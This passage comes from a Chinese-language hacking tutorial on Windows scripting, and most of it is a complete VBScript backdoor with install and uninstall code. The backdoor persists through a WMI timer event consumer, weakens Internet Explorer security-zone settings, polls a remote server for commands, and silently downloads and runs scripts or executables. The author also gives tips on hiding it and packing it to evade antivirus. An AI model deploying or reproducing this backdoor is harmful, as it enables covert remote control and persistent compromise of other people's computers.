使用‘vbs的好處是不用生成文件,而且可以直接利用後門中已經創建的對象,比如shl,但也因此不能用WScript根對象。
下面的‘vbs命令文件把"本地帳戶的共享和安全模式"由"僅來賓"改為"經典"(對XP和2003有效):
‘vbs
shl.regwrite "HKLM/SYSTEM/CurrentControlSet/Control/Lsa/forceguest",0,"REG_DWORD"
註意,vbs和wsh前面都有一個單引號,因為整個命令文件都作為腳本執行,所以必須註釋掉第一行,:bat也是一樣。
使用‘vbs時千萬註意不要有語法錯誤,否則會使後門出錯並停止。如果是復雜的腳本,建議使用‘wsh。
將核心代碼改寫為單行字符串格式,就可以作為ASEC的實例安裝了。改寫時要註意"if"和"end if"配對以及去掉續行符。
完整的安裝腳本代碼如下:
‘***以下為參數配置,請根據情況自行修改***‘
nslink="winmgmts://./root/cimv2:" ‘ASEC所在的名字空間‘
doorname="vbscript_backdoor" ‘記住後門的名字,卸載時需要‘
runinterval=86400000 ‘每天運行一次‘
cmdu="http://myweb.8866.org/cmd.txt" ‘命令文件的位置‘
cmdw=4000 ‘文件下載超時時間‘
cmdl="HKLM/SOFTWARE/Microsoft/WBEM/CIMOM/CmdLength" ‘保存命令長度的鍵值名‘
‘***參數配置結束***‘
createobject("WScript.Shell").regwrite cmdl,0,"REG_DWORD"
‘腳本後門核心代碼‘
stxt="cmdu="""&cmdu&""":cmdw="&cmdw&":cmdl="""&cmdl&""":on error resume next:set shl=createobject(""WScript.Shell""):set aso=createobject(""ADODB.Stream""):set ie=createobject(""InternetExplorer.Application""):zone=""HKCU/SOFTWARE/Microsoft/Windows/CurrentVersion/Internet Settings/Zones/3"":set1=zone&""/1201"":set2=zone&""/1400"":set3=zone&""/CurrentLevel"":val1=shl.regread(set1):val2=shl.regread(set2):val3=shl.regread(set3):regd=""REG_DWORD"":shl.regwrite set1,0,regd:shl.regwrite set2,0,regd:shl.regwrite set3,0,regd:ie.visible=0:ie.navigate ""about""&"":blank"":ie.document.write ""<script>function whr(){return new ActiveXObject(‘WinHttp.WinHttpRequest.5.1‘)}</script>"":with ie.document.script.whr():.settimeouts cmdw,cmdw,cmdw,cmdw:.open ""GET"",cmdu,true:.send:if not .waitforresponse(cmdw) then die:end if:if .status>299 then die:end if:rt=.responsetext:if len(rt)=shl.regread(cmdl) then die:end if:shl.regwrite cmdl,len(rt),regd:cmds=split(rt,vbcrlf,-1):if ubound(cmds)<1 then die:end if:cmdt=lcase(trim(cmds(0))):aso.type=1:aso.open:cd=shl.currentdirectory&chr(92):select case cmdt:case ""‘vbs"":execute(rt):die:case "":bat"":aso.write .responsebody:aso.savetofile cd&""_.bat"",2:aso.close:shl.run chr(34)&cd&""_.bat"""""",0:die:case ""‘wsh"":aso.write .responsebody:aso.savetofile cd&""_.vbs"",2:aso.close:shl.run ""cscript.exe """"""&cd&""_.vbs"""""",0:die:case ""exe"":case else die:end select:if ubound(cmds)<4 then die:end if:.open ""GET"",cmds(1),true:.send:if not .waitforresponse(cmds(2)) then die:end if:if .status>299 then die:end if:path=shl.expandenvironmentstrings(cmds(3)):aso.write .responsebody:aso.savetofile path,2:aso.close:shl.run chr(34)&path&"""""" ""&cmds(4),0:end with:die:sub die:ie.quit:shl.regwrite set1,val1,regd:shl.regwrite set2,val2,regd:shl.regwrite set3,val3,regd:for each ps in getobject(""winmgmts://./root/cimv2:win32_process"").instances_:if lcase(ps.name)=""scrcons.exe"" then ps.terminate:end if:next:end sub"
‘配置事件消費者‘
set asec=getobject(nslink&"ActiveScriptEventConsumer").spawninstance_
asec.name=doorname&"_consumer"
asec.scriptingengine="vbscript"
asec.scripttext=stxt
set asecpath=asec.put_
‘配置計時器‘
set itimer=getobject(nslink&"__IntervalTimerInstruction").spawninstance_
itimer.timerid=doorname&"_itimer"
itimer.intervalbetweenevents=runinterval
itimer.skipifpassed=false
itimer.put_
‘配置事件過濾器‘
set evtflt=getobject(nslink&"__EventFilter").spawninstance_
evtflt.name=doorname&"_filter"
evtflt.query="select * from __timerevent where timerid="""&doorname&"_itimer"""
evtflt.querylanguage="wql"
set fltpath=evtflt.put_
‘綁定消費者和過濾器‘
set fcbnd=getobject(nslink&"__FilterToConsumerBinding").spawninstance_
fcbnd.consumer=asecpath.path
fcbnd.filter=fltpath.path
fcbnd.put_
wscript.echo "安裝完成"
與前一個永久事件處理過程不同的是,腳本後門的事件源是計時器,在每個名字空間都可以實例化並觸發事件。所以,不一定要將ASEC安裝到root/cimv2。特別是XP/2003,ASEC默認已經安裝到root/subscription,只需要相應修改nslink的值,就可以安裝腳本後門了。
卸載腳本後門:
cmdl="HKLM/SOFTWARE/Microsoft/WBEM/CIMOM/CmdLength"
createobject("WScript.Shell").regdelete cmdl ‘刪除保存命令長度的鍵值‘
nslink="winmgmts://./root/cimv2:"
doorname="vbscript_backdoor" ‘根據腳本後門的名字找到各個對象實例‘
myconsumer=doorname&"_consumer"
mytimer=doorname&"_itimer"
myfilter=doorname&"_filter"
set binds=getobject(nslink&"__FilterToConsumerBinding").instances_
for each bind in binds
if strcomp(right(bind.consumer,len(myconsumer)+1),myconsumer&chr(34),1)=0 _
and strcomp(right(bind.filter,len(myfilter)+1),myfilter&chr(34),1)=0 then
bind.delete_
exit for
end if
next
getobject(nslink&"ActiveScriptEventConsumer.Name="""&myconsumer&"""").delete_
getobject(nslink&"__IntervalTimerInstruction.TimerId="""&mytimer&"""").delete_
getobject(nslink&"__EventFilter.Name="""&myfilter&"""").delete_
wscript.echo "卸載完成"
幾點補充說明:
1,腳本後門的優勢在於隱蔽,所以24小時才運行一次是合適的。不用擔心因為系統關機而錯過運行機會,下次啟動時會補上的。
2,為了更好的反查殺,可以給腳本後門的核心代碼加殼。在功能上也可以改進到接近IRC木馬的程度,只不過服務端是Web服務器,不能同時養太多的馬。
3,腳本後門的自啟動和運行依賴於WMI服務,雖然禁用WMI服務就可以杜絕此類後門和木馬,但比起通過註冊表啟動還是可靠的多。如果被蠕蟲病毒利用,恐怕會很麻煩吧。
【結語】
Windows腳本就像萬能膠,能夠把獨立的程序、服務、控件組合起來完成任務。腳本編程的技巧就是組合的技巧。XP和2003比2000自帶更多的命令行工具,WMI也大大加強了,腳本的功能水漲船高,可以說是“只有想不到,沒有做不到”。一切有待你的發掘。
最後,感謝你耐心看完本文,希望本文可以為你學習Windows腳本提供一些幫助。
歡迎來信與我交流 mailto:[email protected]
歡迎訪問幻影旅團 http://www.ph4nt0m.org
【參考資料】
[1] 《Windows腳本技術》 介紹Windows腳本的基礎知識
http://download.microsoft.com/download/win ... 5.6/W982KMe/CN/scd56chs.exe
[2] WMITools 學習腳本必備,包括CIM Studio、Event Registration、Event Viewer和Object Browser四個工具
http://download.microsoft.com/download/.NetStand ... 1.1/NT5XP/EN-US/WMITools.exe
[3] 《WMI技術指南》 出版社:機械工業出版社 作者:Marcin Policht
http://www.huachu.com.cn/itbook/itbookinfo.asp?lbbh=BH99801035
[4] 《System Administration Scripting Guide》 包含大量WMI腳本示例
http://www.sometips.com/soft/script_repository.chm
[5] Script Encoder 官方腳本編碼工具
http://download.microsoft.com/download/win ... .0/WIN98MeXP/CN/sce10chs.exe
[6] 微軟腳本中心
http://www.microsoft.com/china/technet/c ... criptcenter/default.mspx
[7] 《MS Windows Script Host 2.0 Developers Guide》
http://www.sometips.com/soft/wsh.zip
再分享一下我老師大神的人工智能教程吧。零基礎!通俗易懂!風趣幽默!還帶黃段子!希望你也加入到我們人工智能的隊伍中來!https://www.cnblogs.com/captainbed
深入挖掘Windows腳本技術